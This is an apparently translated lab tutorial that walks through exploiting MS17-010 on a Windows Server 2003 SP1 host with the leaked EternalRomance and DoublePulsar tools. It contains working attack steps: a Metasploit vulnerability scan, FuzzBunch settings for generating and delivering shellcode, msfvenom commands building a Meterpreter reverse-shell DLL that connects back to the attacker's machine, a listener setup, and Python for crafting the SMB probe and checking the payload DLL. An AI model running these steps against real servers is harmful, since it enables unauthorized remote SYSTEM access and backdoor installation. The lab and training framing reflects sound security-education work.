This article is of an educational nature; using the proof of concept in uncontrolled environments or without prior authorization could be illegal.
In the previous article on the NSA tools we saw how EternalBlue and DoublePulsar could be used to access a Windows 7 machine remotely, without authentication, through a vulnerability in the SMB protocol. We also saw how to set up the environment and the tools needed to run this framework on the latest version of Kali.
EternalRomance is another exploit against SMB version 1 from the leaked NSA tool collection. It targets Windows XP / Vista / 7 and Windows Server 2003 and 2008. The exploitation process is quite similar to EternalBlue, except that we first have to use DoublePulsar to generate the shellcode that the EternalRomance exploit will deliver.
The link to the previous chapter follows.
Detect the MS17-010 vulnerability with Metasploit
Whether or not the victim has the patch installed can be detected with the Metasploit auxiliary module "MS17-010 SMB RCE Detection" (auxiliary/scanner/smb/smb_ms17_010). The module connects to the IPC$ tree over SMB and attempts a transaction on FID 0. If the status returned is STATUS_INSUFF_SERVER_RESOURCES, the victim does not have the MS17-010 patch; if the server instead returns STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE, the target has been patched.
The module also tells us whether the host has already been infected with DoublePulsar: it sends a Trans2 SESSION_SETUP probe, and an installed backdoor answers with a distinctive multiplex ID from which the module also derives the XOR key shown in the output.
msf auxiliary(smb_ms17_010) > set rhosts 10.28.0.183
rhosts => 10.28.0.183
msf auxiliary(smb_ms17_010) > run
[+] 10.28.0.183:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2003 3790 Service Pack 1) ------------ Vulnerable Server
[!] 10.28.0.183:445 - Host is likely INFECTED with DoublePulsar! - Arch: x86 (32-bit), XOR Key: 0xE260FDE5 -------------- Proof of which host was infected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) >
Looking at the output, the module reports that the Windows 2003 Service Pack 1 server is vulnerable and that it had already been infected with DoublePulsar. As noted above, this module lets us know whether the victim has already been backdoored.
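As an added example (not code from the original article or from Metasploit), the probe described above written out at the wire level: it builds the SMB_COM_TRANSACTION request that peeks named pipe FID 0 over the IPC$ tree, and classifies the NT status in the reply exactly as the module does. The SMB1 session itself (negotiate, session setup, tree connect to IPC$) is assumed to have been established by the caller, for example with impacket; the tree and user IDs, the flags values and the sample replies are constructed for the demonstration.

```python
import struct

# Wire constants from MS-CIFS; the three NT status codes are the ones the scanner keys on.
SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION = 0x25
TRANS_PEEK_NMPIPE = 0x0023                # transaction subcommand used for the probe
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_INVALID_HANDLE = 0xC0000008


def smb_header(command, tid, uid, status=0, pid=0xFEFF, mid=0x40, flags=0x18, flags2=0xC807):
    """32-byte SMB1 header (flags/flags2 are typical client values, assumed here)."""
    return struct.pack("<4sBIBHH8sHHHHH", SMB_MAGIC, command, status, flags, flags2,
                       0, b"\x00" * 8, 0, tid, pid, uid, mid)


def peek_named_pipe_request(tid, uid, fid=0):
    """TRANS_PEEK_NMPIPE on FID 0 (the MS17-010 probe), wrapped in a NetBIOS session header."""
    setup = struct.pack("<HH", TRANS_PEEK_NMPIPE, fid)
    name = b"\\PIPE\\\x00"
    word_count = 14 + len(setup) // 2
    # Parameter/data offsets count from the start of the SMB header; both blocks are empty.
    offset = 32 + 1 + 28 + len(setup) + 2 + len(name)
    words = struct.pack("<HHHHBBHIHHHHHBB",
                        0, 0,                 # TotalParameterCount, TotalDataCount
                        0xFFFF, 0xFFFF,       # MaxParameterCount, MaxDataCount
                        0, 0,                 # MaxSetupCount, Reserved1
                        0, 0,                 # Flags, Timeout
                        0,                    # Reserved2
                        0, offset,            # ParameterCount, ParameterOffset
                        0, offset,            # DataCount, DataOffset
                        len(setup) // 2, 0)   # SetupCount, Reserved3
    smb = (smb_header(SMB_COM_TRANSACTION, tid, uid) + bytes([word_count]) + words + setup
           + struct.pack("<H", len(name)) + name)
    return struct.pack(">I", len(smb)) + smb  # NetBIOS: type 0x00 followed by 24-bit length


def classify_response(raw):
    """Map the raw NetBIOS+SMB reply to the probe onto the scanner's verdicts."""
    if len(raw) < 4 + 32 or raw[4:8] != SMB_MAGIC:
        return "malformed"
    command = raw[8]
    status = struct.unpack_from("<I", raw, 9)[0]
    if command != SMB_COM_TRANSACTION:
        return "unexpected command 0x%02x" % command
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"                   # MS17-010 not installed
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "patched"
    return "unknown status 0x%08x" % status


def probe(sock, tid, uid):
    """Send the probe over an already authenticated SMB1 session and return the verdict.
    The caller has done negotiate / session setup / tree connect to IPC$ (assumption)."""
    sock.sendall(peek_named_pipe_request(tid, uid))
    head = sock.recv(4)
    length = struct.unpack(">I", head)[0] & 0xFFFFFF
    body = b""
    while len(body) < length:
        chunk = sock.recv(length - len(body))
        if not chunk:
            break
        body += chunk
    return classify_response(head + body)


def sample_response(status, tid=0x0800, uid=0x0801):
    """Constructed server reply for offline testing: error replies carry WordCount 0 and ByteCount 0."""
    smb = smb_header(SMB_COM_TRANSACTION, tid, uid, status=status, flags=0x98) + b"\x00" + b"\x00\x00"
    return struct.pack(">I", len(smb)) + smb


if __name__ == "__main__":
    for st in (STATUS_INSUFF_SERVER_RESOURCES, STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        print("0x%08x -> %s" % (st, classify_response(sample_response(st))))
```

Keep the two verdicts separate in tooling: a host that answers with STATUS_ACCESS_DENIED on FID 0 is patched for this specific check, while an unknown status only means the probe was inconclusive and should be logged, not reported as patched.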
Preparing the environment with Kali.
The time has come to prepare the Kali environment, and for this we again use the Hacking Lab we make available to our students. The following are the steps to have everything ready to access the Windows 2003 SP1 server. The Kali version is 2017.1, updated from the 2016 release used in the previous proof of concept.
- A server on the network with Windows 2003 SP1 Enterprise, the victim.
- Kali, the attacker, from which we will launch FuzzBunch under Wine.
If we are connected to the Hacking Lab, our attack scenario will be the following:
- Windows 2003 SP1 victim – 10.28.0.183
- Kali – 10.28.0.28
Generate the shellcode in BIN format with DoublePulsar
Before running EternalRomance we must generate the shellcode as a binary file with DoublePulsar. For this we use the OutputInstall function, indicating where to store the binary file containing the shellcode; this shellcode is what EternalRomance will use to exploit and infect the victim.
Once the backdoor is installed we can inject into a process running as SYSTEM a DLL specially created with msfvenom. For this case we created a Meterpreter reverse shell.
Let's continue with the exploitation steps. The first step is to start FuzzBunch and complete the fields that are requested; the following image shows an example with the data filled in.
Figure 1 – Target configuration
The next step is to create a new project, which plays the same role as a Metasploit workspace.
Figure 2 – We create the project
Next we have to set a few variables such as the architecture, the protocol and the output file. For our lab configuration we can leave most of the defaults, because the target architecture is 32-bit x86, the target protocol is SMB and we only need the shellcode written out as a binary file. The only parameter we must change is OutputFile, where we give the full path of the output file: C:\NSA\shell.bin
Figure 3 – Save shell in binary
Figure 4 – Plugin configuration and success in executed command
As the image shows, everything apparently succeeded, so the BIN file with the shellcode was generated at the specified location:
Figure 5 – Generated file
Use the Smbtouch plugin
Before configuring EternalRomance and running the exploit, note that we are going to use the Smbtouch plugin together with the binary shellcode obtained above. If a different shellcode is supplied, an exception occurs in memory and the server reboots, i.e. a denial of service.
Figure 6 – Uploaded Plugin
The procedure from here on is very similar to the one in the previous article. The first step is to run the exploit and check that the Smbtouch plugin is loaded; the following image shows that we are making use of Smbtouch.
Figure 7 – Smbtouch Loaded in Eternalromance
Pay attention when asked for the shellcode to include in the exploit, so that a denial of service on the server does not occur. We keep all the default parameters except ShellcodeFile, where we give the .BIN file obtained in the first phase with DoublePulsar.
Figure 8 – Upload the previously created BIN file
Once the path is set we continue with the process, where we are asked which exploit method to use and which version of the server we are attacking; in our case we leave all the options at their defaults.
Figure 9 – Exploit Options
Figure 10 – Final Configuration
We choose to continue, and the backdoor is installed successfully without causing a denial of service.
Use DoublePulsar to inject our DLL
The next step is to take advantage of the EternalRomance exploit and the binary previously created with DoublePulsar to load and inject a library into a system process.
Here again are the steps to create the library with msfvenom that we will inject to obtain the shell:
# Open a terminal and create a folder where shell.dll will be stored
mkdir -p ~/nsa && cd ~/nsa
# Create our Meterpreter reverse shell as a DLL; this is what DoublePulsar will inject
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.28.0.28 LPORT=443 -f dll -o shell.dll
# With the DLL ready to be injected into a Windows process, prepare Metasploit to receive the connection
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.28.0.28
set lport 443
exploit -j
Figure 11 – Configure Metasploit
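Before handing the DLL to DoublePulsar it is worth checking that it matches what the scanner reported for the target (Arch: x86, 32-bit) and that it really is a DLL, since RunDLL will not load a mismatched image. The following check is an added example, not code from the original article or from the NSA tools: it parses only the DOS, PE and COFF headers of the file. The file path and the constructed header-only images used for testing are assumptions.

```python
import struct

# COFF / PE header constants (PE/COFF specification)
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
PE32_MAGIC = 0x10B          # 32-bit optional header
PE32PLUS_MAGIC = 0x20B      # 64-bit optional header


def inspect_pe(data):
    """Return (machine, is_dll, optional_header_magic); raise ValueError for non-PE input."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    machine, _nsect, _ts, _psym, _nsym, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_magic = struct.unpack_from("<H", data, e_lfanew + 24)[0] if opt_size >= 2 else 0
    return machine, bool(chars & IMAGE_FILE_DLL), opt_magic


def check_payload_dll(data, target_arch):
    """target_arch is 'x86' or 'x64' as printed by the scanner; returns a list of problems (empty == OK)."""
    try:
        machine, is_dll, opt_magic = inspect_pe(data)
    except ValueError as err:
        return [str(err)]
    want_machine = IMAGE_FILE_MACHINE_I386 if target_arch == "x86" else IMAGE_FILE_MACHINE_AMD64
    want_magic = PE32_MAGIC if target_arch == "x86" else PE32PLUS_MAGIC
    problems = []
    if machine != want_machine:
        problems.append("machine 0x%04x does not match target %s" % (machine, target_arch))
    if not is_dll:
        problems.append("IMAGE_FILE_DLL not set: not a DLL, RunDLL cannot load it")
    if opt_magic != want_magic:
        problems.append("optional header magic 0x%03x does not match target %s" % (opt_magic, target_arch))
    return problems


def build_fake_pe(machine, characteristics, opt_magic):
    """Constructed header-only PE image for offline testing (no sections, not loadable)."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 2, characteristics)
    return dos + b"PE\x00\x00" + coff + struct.pack("<H", opt_magic)


if __name__ == "__main__":
    # Path assumed: the DLL produced by msfvenom in the step above.
    with open("shell.dll", "rb") as fh:
        issues = check_payload_dll(fh.read(), "x86")
    print("OK" if not issues else "\n".join(issues))
```

The same check applies to the shellcode step: DoublePulsar's OutputInstall must be run for the same architecture the scanner reported, otherwise the exploit stage fails or crashes the target rather than installing the backdoor.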
Once everything is ready we run DoublePulsar again, but this time we indicate that we want to inject a DLL: we select the RunDLL option and give the path of the Meterpreter DLL created with msfvenom. The following image shows the final configuration.
Figure 12 – Final configuration before receiving the shell
As a result we obtain a shell on the server 10.28.0.183 with SYSTEM privileges on Windows 2003 SP1.
Figure 12 – Doublepulsar successfully executed and shell in Metasploit
Video POC – https://youtu.be/gDZcpRbxjCM